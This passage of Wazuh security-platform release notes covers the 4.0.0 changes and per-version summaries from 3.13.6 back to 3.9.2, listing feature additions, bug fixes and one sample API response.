  • Added asynchronous aiohttp server for the Wazuh API.

  • The new Wazuh API is approximately 5 times faster on average.

  • Added OpenAPI based Wazuh API specification.

  • Improved Wazuh API reference documentation based on OpenAPI spec using redoc.

  • Added a new yaml Wazuh API configuration file.

  • Added new endpoints to manage API configuration and deprecated configure_api.sh.

  • Added RBAC support to Wazuh API.

  • Added new endpoints for Wazuh API security management.

  • Added SQLAlchemy ORM based database for RBAC.

  • Added a new JWT authentication method.

  • Wazuh API up and running by default in all nodes for a clustered environment.

  • Added new and improved error handling.

  • Added tavern and docker based Wazuh API integration tests.

  • Added new and unified Wazuh API response structure.

  • Added new endpoints for Wazuh API users management.

  • Added a new endpoint to restart agents that belong to a node.

  • Added and improved q filter in several endpoints.

  • Tested and improved Wazuh API security.

  • Added DDOS blocking system.

  • Added brute force attack blocking system.

  • Added content-type validation.

  • Added and updated framework unit tests to increase coverage.

  • Added improved support for monitoring paths from environment variables.

  • Added auto-enrollment capability. Agents are now able to request a key from the manager if the current key is missing or wrong.

Vulnerability Detector

  • Redhat vulnerabilities are now fetched from OVAL benchmarks.

  • Debian vulnerable packages are now fetched from the Security Tracker.

  • The Debian Security Tracker feed can be loaded from a custom location.

  • Allow compressed feeds for offline updates.

  • The manager now updates the MSU feed automatically.

  • CVEs with no affected version defined in all the feeds are now reported.

  • CVEs vulnerable for the vendor and missing in the NVD are now reported.

Changed
  • Changed multiple Wazuh API endpoints.

  • Refactored framework module in SDK and core.

  • FIM Windows events handling refactored.

  • Changed framework to access global.db using wazuh-db.

  • Changed agent-info synchronization task in Wazuh cluster.

Fixed
  • Fixed an error with the last scan time in syscheck endpoints.

  • Added support for monitoring directories that contain commas.

  • Fixed a bug where configuring a directory to be monitored as realtime and whodata resulted in realtime prevailing.

  • Fixed using an incorrect mutex while deleting inotify watches.

  • Fixed a bug that could cause multiple FIM threads to request the same temporary file.

  • Fixed a bug where deleting a file permanently in Windows would not trigger an alert.

  • Fixed a typo in the file monitoring options log entry.

  • Fixed an error where monitoring a drive in Windows under scheduled or realtime mode would generate alerts from the recycle bin.

  • When monitoring a drive in Windows in the format U:, it will monitor U:\ instead of the agent's working directory.

  • Fixed a bug where monitoring a drive in Windows with recursion_level set to 0 would trigger alerts from files inside its subdirectories.

  • Fixed an Azure wodle dependency error. The package azure-storage-blob>12.0.0 does not include a component used.

Vulnerability Detector

  • Vulnerabilities of Windows Server 2019 which do not affect to Windows 10 were not being reported.

  • Vulnerabilities patched by a Microsoft update with no supersedence were not being reported.

  • Vulnerabilities patched by more than one Microsoft update were not being evaluated against all the patches.

  • Duplicated alerts in Windows 10.

  • Syscollector now discards hotfixes that are not fully installed.

  • Syscollector now collects hotfixes that were not being parsed.

Removed
  • Removed Wazuh API cache endpoints.

  • Removed Wazuh API rootcheck endpoints.

  • Deprecated Debian Jessie and Wheezy for Vulnerability Detector (EOL).

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.0.

  • Support for Kibana v7.9.1 and v7.9.2.

  • Support for Open Distro 1.10.1.

  • Added a RBAC security layer integrated with Open Distro and X-Pack.

  • Added remoted and analysisd statistics.

  • Expand supported deployment variables.

  • Added new configuration view settings for GCP integration.

  • Added logic to change the metafields configuration of Kibana.

Changed
  • Migrated the default index-pattern to wazuh-alerts-*.

  • Removed the known-fields functionality.

  • Security Events dashboard redesigned.

  • Redesigned the app settings configuration with categories.

  • Moved the wazuh-registry file to Kibana optimize folder.

Fixed
  • Format options in wazuh-alerts index-pattern are not overwritten now.

  • Prevent blank page in detail agent view.

  • Navigable agents name in Events.

  • Index pattern is not being refreshed.

  • Reporting fails when agent is pinned and compliance controls are visited.

  • Reload rule detail does not work properly with the related rules.

  • Fix search bar filter in Manage agent of group.

Wazuh ruleset
  • Changed compliance rules groups and removed alert_by_email option by default.

  • Let the Ruleset update tool pick up the current version branch by default.

Wazuh packages
Added
  • Added Open Distro for Elasticsearch packages to Wazuh's software repository.

Changed
  • Wazuh services are no longer enabled nor started in a fresh install.

  • Wazuh services will be restarted on upgrade if they were running before upgrading them.

  • Wazuh API and Wazuh Manager services are unified in a single wazuh-manager service.

  • Wazuh plugin for Kibana package has been renamed.

  • Wazuh VM now uses Wazuh and Open Distro for Elasticsearch.

Fixed
  • Unit files for systemd are now installed on /usr/lib/systemd/system.

  • Improved the upgrade of unit files.

  • ossec-init.conf file now shows the build date for any system.

  • Fixed an error setting SCA file permissions on .deb packages.

Removed
  • The Wazuh API package has been removed. Now, the Wazuh API is embedded into the Wazuh Manager installation.

  • Removed OpenSCAP files and integration.

Wazuh documentation
Added
  • Added instructions to install Wazuh along with Open Distro for Elasticsearch.

  • Added scripts, created by the Wazuh team, that allow the user to install Wazuh and Elastic Stack automatically.

  • Added tabs in the installation guide to ease the navigation through the different options available.

  • Added a 'More installation alternatives' section that provides instructions on how to install Wazuh along with commercial options like Elastic Stack basic license or Splunk. This section also includes instructions on how to install Wazuh from sources.

Changed
  • Reorganized the installation guide to help the user through the installation process of Wazuh and Elastic Stack in a single section.

  • Split the installation guide in all-in-one installation and distributed deployment.

  • Reorganized the upgrade guide.

3.x

This section summarizes the most important features of each Wazuh 3.x release.

Wazuh version

Release date

3.13.6

19 September 2022

3.13.5

24 August 2022

3.13.4

30 May 2022

3.13.3

28 April 2021

3.13.2

22 September 2020

3.13.1

15 July 2020

3.13.0

22 June 2020

3.12.3

30 April 2020

3.12.2

9 April 2020

3.12.1

8 April 2020

3.12.0

24 March 2020

3.11.4

25 February 2020

3.11.3

28 January 2020

3.11.2

22 January 2020

3.11.1

10 January 2020

3.11.0

23 December 2019

3.10.2

23 September 2019

3.10.1

19 September 2019

3.10.0

18 September 2019

3.9.5

8 August 2019

3.9.4

7 August 2019

3.9.3

9 July 2019

3.9.2

10 June 2019

3.9.1

21 May 2019

3.9.0

2 May 2019

3.8.2

31 January 2019

3.8.1

24 January 2019

3.8.0

18 January 2019

3.7.2

17 December 2018

3.7.1

5 December 2018

3.7.0

10 November 2018

3.6.1

7 September 2018

3.6.0

29 August 2018

3.5.0

10 August 2018

3.4.0

24 July 2018

3.3.1

18 June 2018

3.3.0

8 June 2018

3.2.4

1 June 2018

3.2.3

28 May 2018

3.2.2

7 May 2018

3.2.1

2 March 2018

3.2.0

8 February 2018

3.1.0

22 December 2017

3.0.0

3 December 2017

3.13.6 Release notes - 19 September 2022

This section lists the changes in version 3.13.6. More details about these changes are provided in each component changelog:

Wazuh core
  • #14823 A path traversal flaw in Active Response affecting agents from v3.6.1 is fixed.

Wazuh Kibana app
  • Support for Wazuh v3.13.6.

Wazuh Splunk
  • Support for Wazuh v3.13.6.

3.13.5 Release notes - 24 August 2022

This section lists the changes in version 3.13.5. More details about these changes are provided in each component changelog:

Wazuh Kibana app
  • #4336 Sanitize the report's inputs and usernames.

Wazuh Splunk
  • Support for Wazuh v3.13.5.

3.13.4 Release notes - 30 May 2022

This section lists the changes in version 3.13.4. More details about these changes are provided in each component changelog:

Wazuh core
  • A crash in Vulnerability Detector when scanning agents running on Windows is now fixed (backport from 4.3.2).

Wazuh Kibana app
  • Support for Wazuh v3.13.4.

Wazuh Splunk
  • Support for Wazuh v3.13.4.

3.13.3 Release notes - 28 April 2021

This section lists the changes in version 3.13.3. More details about these changes are provided in each component changelog:

Wazuh core
  • Issue is fixed in Vulnerability Detector that made modulesd crash while updating the NVD feed due to a missing CPE entry.

Wazuh Kibana app
  • Support for Wazuh v3.13.3.

Wazuh Splunk
  • Support for Wazuh v3.13.3.

3.13.2 Release notes - 22 September 2020

This section lists the changes in version 3.13.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Updated the default NVD feed URL from 1.0 to 1.1 in Vulnerability Detector.

Wazuh Kibana app
  • Support for Wazuh v3.13.2.

Wazuh Splunk
  • Support for Wazuh v3.13.2.

3.13.1 Release notes - 15 July 2020

This section lists the changes in version 3.13.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Added the settings <max_retries> and <retry_interval> to adjust the amount of connection retries and the agent failover interval.

  • Fixed Modulesd crash caused by Vulnerability Detector when OS inventory is disabled for the agent.

Wazuh Kibana app
  • Support for Wazuh v3.13.1.

Wazuh API
  • New validator added to the endpoint /sca/:agent_id/checks/:policy_id that allows using filter the SCA checks by reason, status, and command.

Wazuh Splunk
  • Support for Wazuh v3.13.1.

  • Support for Splunk v8.0.4.

  • Updated references of the field vulnerability.reference to vulnerability.references.

  • Fixed wazuh-monitoring indices on Splunk 8.0+ version.

3.13.0 Release notes - 22 June 2020

This section lists the changes in version 3.13.0. More details about these changes are provided in each component changelog:

Wazuh core

Added

  • Included the NVD as a feed for Linux agents in vulnerability detector.

  • Improved the vulnerability detector engine to correlate alerts between different feeds.

  • Added vulnerability detector module unit testing for Unix source code.

  • Added a timeout to the updates of the vulnerability detector's feeds to prevent hangings.

  • Added option for the JSON decoder to choose the treatment of array structures.

  • Added mode value (real-time, Who-data, or scheduled) as a dynamic field in FIM alerts.

  • Added a field to configure the maximum files to be monitored by the FIM module.

  • New module to pull and process logs from Google Cloud Pub/Sub service.

  • Added support for mapping rules with MITRE ATT&CK framework.

  • Added as a dependency Microsoft's Software Update Catalog used by vulnerability detector.

  • Added support for aarch64 and armhf architectures.

Changed

  • Decreased event fetching delay from 10 miliseconds to 5 miliseconds in FIM modes real-time and whodata (rt_delay).

  • Who-data includes new fields: process CWD, parent process id, and CWD of parent process.

  • FIM now allows to rename/delete files while calculating their hash.

  • Extended the statics fields comparison in the ruleset options.

  • The state field has been removed from vulnerability alerts.

  • The NVD is now the primary feed for the vulnerability detector in Linux.

  • Removed OpenSCAP policies installation and configuration block.

  • Changed same/different_systemname for same/different_system_name in Analysisd static filters.

  • Updated the internal Python interpreter from v3.7.2 to v3.8.2.

Other fixes and improvements

  • Fixed a bug that occasionally, kept the memory reserved when deleting monitored directories in FIM.

  • Fixed and issue regarding inotify watchers allocation when modifying directories in FIM real-time.

  • Fixed an error that caused the alerts deletion with a wrong path in Who-data mode.

  • Fixed an issue that did not generate alerts in Who-data mode when a subdirectory was added to the monitored directory in Windows.

  • Avoided the truncation of the full log field of the alert when the path is too long.

  • When there is a failure setting policies in Windows, FIM will automatically change from Who-data to real-time mode.

  • Fixed an error that prevented from restarting Windows agents from the manager.

  • Fixed an error that did not allow the usage of the tag URL by configuring the NVD in a vulnerability detector module.

  • Fixed TOCTOU condition in Clusterd when merging agent-info files.

  • Fixed race condition in Analysisd when handling accumulated events.

  • Avoided to count links when generating alerts for ignored directories in Rootcheck.

  • Fixed typo in the path used for logging when disabling an account.

  • Fixed an error when receiving different Syslog events in the same TCP packet.

  • Fixed a bug in vulnerability detector on Modulesd when comparing Windows software versions.

  • Fixed a bug that caused an agent's disconnection time not to be displayed correctly.

  • Optimized the function to obtain the default gateway.

  • Fixed host verification when signing a certificate for the manager.

  • Fixed possible duplicated ID on client.keys adding new agent through the API with a specific ID.

  • Avoid duplicate descriptors using wildcards in localfile configuration.

  • Guaranteed that all processes are killed when service stops.

  • Fixed mismatch in integration scripts when the debug flag is set to active.

Wazuh Kibana App

Added

  • Support for Wazuh v3.13.0.

  • Support for Kibana v7.7.1

  • Support for Open Distro 1.8

  • Added new navigation experience with a global menu.

  • Added a breadcrumb in Kibana top nav.

  • Added a new Agents Summary Screen.

  • Added a new feature to add sample data to dashboards.

  • Added MITRE integration.

  • Added Google Cloud Platform integration.

  • Added TSC integration.

  • Added a new integrity monitoring state view for agent.

  • Added a new integrity monitoring files detail view.

  • Added a new component to explore compliance requirements.

Changed

  • Code migration to React.js.

  • Global review of styles.

  • Unified Overview and Agent dashboards into new Modules.

  • Changed vulnerabilities' dashboard visualizations.

Fixed

  • Fixed Open Distro tenants to be functional.

  • Improved navigation performance.

  • Avoid creating the wazuh-monitoring index pattern if it is disabled.

  • SCA checks without compliance field could not be expanded.

Wazuh API

Added

  • Added new API requests:
    • GET/mitre

    • GET/rules/mitre

    • GET/rules/tsc

  • Added new filters in request GET/rules:
    • mitre: Filters the rules by mitre requirement.

    • tsc: Filters the rules by tsc requirement.

Changed

  • Increased the maximum allowed size of the files to be uploaded from 1MB to 10MB. This change applies to:

    • POST /manager/files

    • POST /cluster/:node_id/files

    • POST /agents/groups/:group_id/configuration

    • POST /agents/groups/:group_id/files/:file_name

Wazuh ruleset

Added

  • Added rules and decoders for macOS sshd logs.

  • Added TSC/SOC compliance mapping.

  • Added rules and decoders for PaloAlto logs.

  • Added rules and decoder to monitor the FIM database status.

  • Added rules for WAF.

Changed

  • Changed description of vulnerability detector rules.

  • Changed squid decoders.

Fixed

  • Fixed the provider name so that Windows Eventlog's logs match with the Wazuh rules.

  • Fixed static filters related to the system_name field.

  • Removed trailing whitespaces in the group name section of the ruleset.

  • Removed invalid zeroes from rules id.

Wazuh Splunk
  • Support for Wazuh v3.13.0

3.12.3 Release notes - 30 April 2020

This section lists the changes in version 3.12.3. More details about these changes are provided in each component changelog:

Wazuh core
  • Disabled WAL in databases handled by Wazuh DB to save disk space.

  • Fixed a bug in Remoted that could prevent agents from connecting in UDP mode.

  • Fixed a bug in the shared library that caused that daemons could not find the ossec group.

  • Prevented Syscollector from falling into an infinite loop when failed to collect the Windows hotfixes.

  • Fixed a memory leak in the system scan by Rootcheck on Windows.

  • Fixed a bug in Logcollector that caused that the out_format option did not apply for the targeted agent.

  • Fixed a bug that caused FIM could not handle large inode numbers correctly.

  • Fixed a bug that made ossec-dbd crash due to a bad mutex initialization.

Wazuh Kibana App
  • Support for Wazuh v3.12.3

Wazuh Splunk
  • Support for Wazuh v3.12.3

3.12.2 Release notes - 9 April 2020

This section lists the changes in version 3.12.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed a bug in Vulnerability Detector that made wazuh-modulesd crash when parsing the version of a package from a RHEL feed.

Wazuh Kibana App
  • Support Wazuh 3.12.2.

Wazuh Splunk
  • Support for Wazuh v3.12.2

3.12.1 Release notes - 8 April 2020

This section lists the changes in version 3.12.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Updated MSU catalog on 31/03/2020.

  • Fixed XML validation with paths ending in \.

  • Fixed compatibility with the Vulnerability Detector feeds for Ubuntu from Canonical, that are available in a compressed format.

  • Added missing field database to the FIM on-demand configuration report.

  • Fixed a bug in Logcollector that made it forward a log to an external socket infinite times.

  • Fixed a buffer overflow when receiving large messages from Syslog over TCP connections.

  • Fixed a malfunction in the Integrator module when analyzing events without a certain field.

  • Removed support for Ubuntu 12.04 (Precise) in Vulneratiliby Detector as its feed is no longer available.

Wazuh Kibana App
  • Support Wazuh 3.12.1

  • Added new FIM settings on configuration on demand.

  • Updated agent's variable names in deployment guides.

  • Pagination is now displayed as tables.

Wazuh ruleset
  • Fixed the Dropbear brute force rule entrypoint.

Wazuh Splunk
  • Support for Wazuh v3.12.1.

  • Added new FIM settings on configuration on demand.

3.12.0 Release notes - 24 March 2020

This section lists the changes in version 3.12.0. More details about these changes are provided in each component changelog:

Wazuh core

File integrity monitoring

  • Added synchronization capabilities for FIM.

  • Added SQL database for the FIM module. Its storage can be switched between disk and memory.

  • Added FIM module unit testing for Unix source code.

  • Added FIM module unit testing for Windows source code.

  • Moved the FIM logic engine to the agent.

Logcollector

  • Avoided reopening the current socket when Logcollector fails to send an event.

  • Prevent Logcollector from starving when has to reload files.

  • Made Logcollector continuously attempt to reconnect with the agent daemon.

AWS

  • Added support for monitoring Cisco Umbrella S3 buckets.

  • Added support for monitoring AWS S3 buckets in GovCloud regions.

Other fixes and improvements

  • Added multi-target support for unit testing

  • Added a status validation when starting Wazuh.

  • Added automatic reconnection with the Eventchannel service when it is restarted.

  • Made Windows agents send the keep-alive independently.

  • Source IP address checking by default in the registration process is no longer enforced.

  • Fixed a small memory leak in clustered.

  • Fixed a crash in the fluent forwarder when SSL is not enabled.

  • Replaced non-reentrant functions to avoid race condition hazards.

  • Fixed the registration of more than one agent as any when forcing to use the source IP address.

  • Fixed Windows upgrades in custom directories.

  • Fixed the format of the alert payload passed to the Slack integration.

Wazuh Kibana App
  • Support for Wazuh v3.12.0

  • Added a new setting to hide manager alerts from dashboards.

  • Added a new setting to be able to change API from the top menu.

  • Added a new setting to enable/disable the known fields health check.

  • Added suport for PCI 11.2.1 and 11.2.3 rules.

  • Restructuration of the optimize/wazuh directory.

  • Improved performance of Dasboards reports generation.

  • Discover time range selector is now displayed on the Cluster section.

  • Added the win_auth_failure rule group to Authentication failure metrics.

  • Negative values in Syscheck attributes now have their correct value in reports.

Wazuh API
  • Enabled HTTPS by default in installation script.

  • Added distinct parameter to syscheck endpoints.

  • Added condition field to SCA endpoints.

  • Fixed a bug that made requests not being distributed to the selected node_id.

Wazuh ruleset
  • Extended the rules to detect shellshock attacks.

  • Updated Roundcube decoder to support versions greater than 1.4.

  • Added rules and decoders for Junos.

  • Fixed GPG requirement in Windows rules.

  • Improved Cisco decoders and fixed Owlh rule's IDs conflict.

  • Fixed checkpoint decoders to read events with a different format.

3.11.4 Release notes - 25 February 2020

This section lists the changes in version 3.11.4. More details about these changes are provided in each component changelog:

Wazuh core

Agent

  • Fixed a bug on Agentd that prevented agents from resolving host names after initialization.

3.11.3 Release notes - 28 January 2020

This section lists the changes in version 3.11.3. More details about these changes are provided in each component changelog:

Wazuh core

Agent

  • Fixed a bug in Rootcheck on Windows that caused false positives about file size mismatch.

3.11.2 Release notes - 22 January 2020

This section lists the changes in version 3.11.2. More details about these changes are provided in each component changelog:

Wazuh core

Security Configuration Assessment

  • Fixed handler leaks on SCA module for Windows agents.

Vulnerability Detector

  • The module needed around 1 GB memory during the NVD feed fetch. The memory usage now remains on a few hundred MBs.

Rootcheck

  • Fixed bug on Rootcheck scan that led to 100% CPU usage spikes. The <readall> option was wrongly applied, even when disabled.

  • Fixed handler leaks on Rootcheck module for Windows agents.

Other fixes and improvements

  • Fixed a memory leak in Clusterd: the RAM usage was steadily climbing through the days until the memory was exhausted.

  • Ruleset update lead to incorrect VERSION file permissions.

  • The Slack integration now correctly handles alerts with no description.

Wazuh UI for Kibana
  • Increased list filesize limit for the CDB-list.

  • The XML validator now correctly handles the -- string within comments.

3.11.1 Release notes - 10 January 2020

This section lists the changes in version 3.11.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed a bug in the manager that made Analysisd max out the CPU usage when decoding logs from Windows Eventchannel.

3.11.0 Release notes - 23 December 2019

This section shows the most relevant improvements and fixes in version 3.11.0. More details about these changes are provided in each component changelog:

Wazuh core

Vulnerability detector

  • Windows support. Thanks to a combination of NVD feed and the Microsoft Security guide, the module is able to detect system vulnerabilities and software vulnerabilities.

  • Added support for Debian 10 and RHEL 8.

  • Vulnerability detector alerts include PCI-DSS mapping.

Inventory

  • Added extraction for Windows Security Updates (hotfixes).

  • Processes and ports are now supported in macOS.

Log collection

  • Allowed JSON escaping for logs in the output format.

  • Added the host's primary IP address in the output format.

  • Wildcards don't detect directories as log files any more.

Analysis engine

  • Frequency based rules aggregate the counter for the same event source by default. Introduced a new setting to toggle this behavior: global_frequency.

  • Fields protocol, system_name, data and extra_data can now be used for event matching in rules creation.

  • The ossec-makelist binary has been deprecated. The Analysisd daemon will compile the CDB lists on the startup.

Other fixes and improvements

  • The Wazuh agent now waits until the network service is ready before start.

  • The agent key request service now displays a warning message when registering to an unverified manager.

  • Improved <address> field validation at agent start up.

  • Windows EventChannel alerts now include the full message with the coded field translation.

Wazuh API
  • The query parameter (q) now can be used for filtering rules, decoders and logs.

  • New endpoint I: PUT /agents/group/{group_id}/restart for restarting all agents assigned to a group.

  • New endpoint II: GET /syscollector/:agent_id/hotfixes for listing the system hotfixes (Windows).

  • Improved error descriptions for the PUT /agents/:agent_id/upgrade_custom API call.

Wazuh Ruleset
  • New decoders and rules for McAfee ePolicy Orchestrator.

  • Added rules to collect events related to the Windows firewall.

  • OSQuery logs related to internal messages appear in alerts.

Wazuh WUI for Kibana
  • Support for Kibana: v6.8.6, v7.5.1.

  • Support for OpenDistro: v1.3.0.

  • The API credentials configuration has been migrated from the .wazuh index to the wazuh.yml configuration file. Now the hosts API configuration is managed from this configuration file instead from the WUI.

  • Reporting module events are now logged in the Wazuh WUI logs.

  • The index pattern selector is now hidden in case that only one index exists.

  • Fixed CSV export for files in a agents group.

Wazuh WUI for Splunk
  • CDB lists names are now correctly displayed.

  • Fixed a bug in Syscheck section when generating the PDF configuration summary.

Other additions and improvements

  • The new log collection option <reconnect_time> is included in the Log collection configuration section.

  • Rules/Decoders/CDB-lists files can be uploaded using a Drag & Drop feature.

  • Extended the "Add new agent" guide.

  • Opening an empty file is now correctly handled and doesn't lead to an unexpected error.

3.10.2 Release notes - 23 September 2019

This section lists the changes in version 3.10.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed error in log collection module when reloading localfiles with strftime wildcards.

3.10.1 Release notes - 19 September 2019

This section lists the changes in version 3.10.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fix error in Remoted when reloading agent keys (locked mutex disposal).

  • Fix invalid read error in Remoted counters.

Wazuh API
  • Fixed error after removing a high volume of agents from a group using the Wazuh API.

3.10.0 Release notes - 18 September 2019

This section shows the most relevant improvements and fixes in version 3.10.0. More details about these changes are provided in each component changelog:

Wazuh core

Security Configuration Assessment

  • Improved internal logic engine and policy syntax changes. Available SCA policies have been also adapted to this refactor.

  • A numerical comparator has been included as part of the rules syntax.

  • Compliance mapping information is now part of the alert groups.

  • Policies present at the default folder are now automatically loaded.

  • The Manager will request the last assessment results when the DB is empty between scans.

For further information, check our SCA documentation.

HIPAA/NIST support

  • HIPAA and NIST 800 53 groups were added to the compliance groups parser.

  • New corresponding fields in the Wazuh Elastic Stack template.

Thanks to this additions, the app includes new HIPAA and NIST 800 53 compliance dashboards.

File integrity monitoring

  • FIM now identifies equivalent paths adding them only once.

  • It has been fixed an error in Windows who-data when handling the directories list.

  • Who-data Linux alerts with hexadecimal fields are now correctly handled.

AWS module

  • Fixed the exception handling when using an invalid bucket.

  • Fixed an error when getting profiles in custom AWS buckets.

  • Fixed the error message when an AWS bucket is empty.

IPv6 Compatibility

  • Increased the IP address internal representation size to support IPv6.

  • IPv6 loopback address has been added to localhosts list in the DB output module.

Other fixes and improvements

  • The log collection module now extends the duplicate file detection with inode comparison, useful for symbolic and hard links.

  • Agentless queries now accept ] and > characters as terminal prompt characters.

  • The mail module now supports alerts with the full_log field when using alerts.json as alerts source.

  • On overwriting rules, list field is now correctly copied from the original to the overwriting rule.

  • Fixed an error in the hardware inventory collector for PowerPC architectures.

Wazuh API
  • A new API request has been created to get the full summary of agents:

    GET /summary/agents
    
    {
    "error": 0,
    "data": {
    
        ...
        "agent_status": {
            "Total": 6,
            "Active": 6,
            "Disconnected": 0,
            "Never connected": 0,
            "Pending": 0
        },
        "agent_version": {
            "items": [
                {
                "version": "Wazuh v3.10.0",
                "count": 1
                },
                {
                "version": "Wazuh v3.9.5",
                "count": 5
                }
            ],
            "totalItems": 6
        },
        "last_registered_agent": {
            "os": {
                "arch": "x86_64",
                "codename": "Bionic Beaver",
                "major": "18",
                "minor": "04",
                "name": "Ubuntu",
                "platform": "ubuntu",
                "uname": "Linux |ee7d4f51c0ae |4.18.0-16-generic |#17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 |x86_64",
                "version": "18.04.2 LTS"
            },
        ...
        }
    }
    
  • Support for HIPAA, NIST 800 53 and GPG13 compliance: adding new API requests and filters.

  • Improvements in stored passwords security: encryption changed from MD5 to BCrypt.

  • Fixed API installation in Docker CentOS 7 containers.

Wazuh Ruleset

981 rules have been mapped to support HIPAA and NIST 800 53 compliance. In addition, the SCA policies have been fully reviewed, adapted to the module refactor and added support for new platforms.

It has been added rules and decoders for other technologies:

  • Rules for the VIPRE antivirus.

  • Support for Cisco-ASA devices with new rules and decoders.

  • Added Windows Software Restriction Policy rules.

  • Added Perdition(imap/pop3 proxy) rules.

  • Added support for NAXSI web application firewall.

Wazuh Kibana App
  • HIPAA and NIST 800 53 new dashboards for the recently added regulatory compliance mapping.

  • Added support for custom Kibana spaces.

  • Wazuh Kibana app now works as a native plugin and can be safely hidden/displayed depending on the selected space.

  • New alerts summary in Overview > FIM panel.

  • Alerts search bar fixed for Kibana v7.3.0, now queries are applied as expected.

  • Hide attributes field from non-Windows agents in the FIM table.

  • Fixed broken view in Management > Configuration > Amazon S3 > Buckets.

  • Restored Remove column feature in Discover tabs.

  • The app installation date is now correctly updated.

Wazuh Splunk App
  • HIPAA and NIST 800 53 new dashboards for the recently added regulatory compliance mapping.

  • New design and several UI/UX changes.

  • Wazuh Splunk app has been adapted for Microsoft Edge Browser.

  • Debug level added for app logs.

  • Modules are being shown only when supported by the agent OS.

  • API sensitive information is now hidden on every transition.

  • Non-active Agent data is now being shown correctly.

Other additions and improvements for both Apps

  • Export all the information of a Wazuh group and its related agents in a PDF document.

  • Export the configuration of a certain agent as a PDF document.

  • Added an interactive and user-friendly guide for agents registering, ending in a copy & paste snippet.

3.9.5 Release notes - 8 August 2019

This section shows the most relevant improvements and fixes in version 3.9.5. More details about these changes are provided in each component changelog:

Wazuh manager
  • Fixed a bug in the Framework that prevented Cluster and API from handling the file client.keys if it's mounted as a volume on Docker.

  • Fixed a bug in Analysisd that printed the millisecond part of the alerts' timestamp without zero-padding. That prevented Elasticsearch 7 from indexing those alerts.

Wazuh Kibana app
  • Fixed a bug present in Kibana v7.3.0, affecting Firefox browser, which creates an endless loop if two or more query filters are added.

3.9.4 Release notes - 7 August 2019

This section shows the most relevant improvements and fixes in version 3.9.4. More details about these changes are provided in each component changelog:

Wazuh agent
  • Fixed a bug in FIM that made it apply a wrong configuration. This occurred when defining different options for nested directories.

  • Fixed a bug in Logcollector that made it apply a wrong configuration. This happened when defining multiple stanzas for the same file with different options.

  • Fixed a bug in the agent that could make it truncate its IP address within the control message.

  • Fixed a bug in the Windows agent that produced a resource leak when monitoring directories in who-data mode.

Wazuh manager
  • Fixed a bug in Analysisd that could potentially make it crash while handling JSON objects due to a race condition.

  • Fixed a bug in Wazuh DB that could make it crash when closing database files due to a double free.

  • Fixed a bug in Remoted that made it send data to an agent that has just disconnected in TCP mode.

  • Prevent SCA from producing inconsistencies in the database on the manager side when policy IDs are duplicated.

  • Fixed a race condition hazard between Clusterd and Remoted while synchronizing agent-related files.

  • Wazuh DB did not remove a database file until was committed. Now, the database will be closed immediately.

Wazuh Apps
  • Allowed filtering by clicking a column in rules/decoders tables.

  • Allowed open file in rules table clicking on the file column.

  • Improved Kibana app performance.

  • Removed path filter from custom rules and decoders.

  • Now path column in rules and decoders is shown.

  • Removed SCA overview dashboard.

  • Disabled last custom column removal.

  • Agents messages across sections have been unified.

  • Fixed check stored APIs.

  • Improved wz-table performance.

  • Fixed inconsistent data between visualizations and tables in Overview Security Events.

  • Timezone applied in cluster status.

  • Fixed Overview Security Events report when wazuh.monitoring is disabled.

  • Now duplicated visualization toast errors are handled.

  • Fixed not properly updated breadcrumb in ruleset section.

  • Implicit filters can't be destroyed now.

  • Fixed windows agent dashboard that didn't show failure logon access.

  • Scrollbars in file viewers have been fixed on Firefox.

  • Fixed agent search filters lost when refreshing.

  • Number of agents is now properly updated.

  • Alerts of level 12 are now displayed on the Security Events table.

3.9.3 Release notes - 9 July 2019

This section shows the most relevant improvements and fixes in version 3.9.3. More details about these changes are provided in each component changelog:

Wazuh core
  • Log collector will not report Windows Eventchannel events bookmarked by default.

  • Agent-info that are not generated in utf-8 format will be discarded.

  • Fix memory leak in Modules Daemon when your on-demand configuration was requested.

  • Fixed a bug that crashed Analysisd and Logtest when trying rules having <different_geoip> and no <not_same_field> stanza.

  • Fixed the parser of the Canonical's OVAL feed due to a syntax change.

  • Rules with <list lookup="address_match_key" /> produced a false match if the CDB list file is missing.

  • Remote configuration was missing the <ignore> stanzas for Syscheck and Rootcheck when defined as sregex.

Wazuh apps
  • Added support for Kibana v7.2.0.

  • Added support for Kibana v6.8.1.

  • Fixed height for the menu directive with Dynamic height.

  • Fixed timepicker in cluster monitoring.

  • Fixed time offset for reporting table.

  • Fixed API call for fetching GDPR requirements in agents.

  • Fixed filters which were not applying when refreshing agents search bar.

  • Fixed wrong fields in never connected agents.

  • Fixed the error message when the App detects an unexpected Wazuh version.

  • Fixed invalid date message in some web browsers.

  • Fixed missing ignored and ignored_sregex fields in the configuration ondemand.

Wazuh ruleset
  • Changed NGINX decoder to make the field "server" optional. (Credits to @iasdeoupxe).

  • Remove unwanted tailing single quote in Audit decoder. (Credits to @branchnetconsulting).

  • Avoid conflicts between the "uid" and "auid" fields in the Audit decoder. (Credits to @tokibi).

  • Exclude the full log field from rules for AWS, Suricata, VirusTotal, OwnCloud, Vuls, CIS-CAT, Vulnerability Detector, MySQL, Osquery and Azure.

3.9.2 Release notes - 10 June 2019

This section shows the most relevant improvements and fixes in version 3.9.2. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed configuration request for whitelists when the block was empty.

  • Fixed error deleting temporary files during cluster synchronization.

  • Changes wrong permissions on agent groups files when they are synchronized by the cluster.

  • Memory errors fixed in CIS-CAT module.

  • Fixed error checking agent version in remote upgrades.

  • Fixed race condition in analysis daemon when decoding SCA events. Using reentrant functions in order to maintain context between successive calls.

  • Fixed a file descriptor leak in modulesd. This bug appeared when the timeout was exceeded when executing a command.

  • Fixed invalid content handling RedHat feed, causes unexpected exit in Wazuh modules daemon.

  • Prevent the agent from stopping if it fails to resolve the manager hostname on startup.

Wazuh apps
  • Fixed visualization in agent overview dashboard.

  • Fix adding API data in an invalid format.

  • Adapt request executed in DevTool to the API standards.

  • Get same metrics security events dashboard that in the agents overview.

  • Fixed SCA policy checks table.

  • Added missing dependency for Discover.

Wazuh ruleset
  • Fixed Windows rule about audit log.

  • Fixed invalid check of the Solaris 11 SCA policy.

3.9.1 Release notes - 21 May 2019

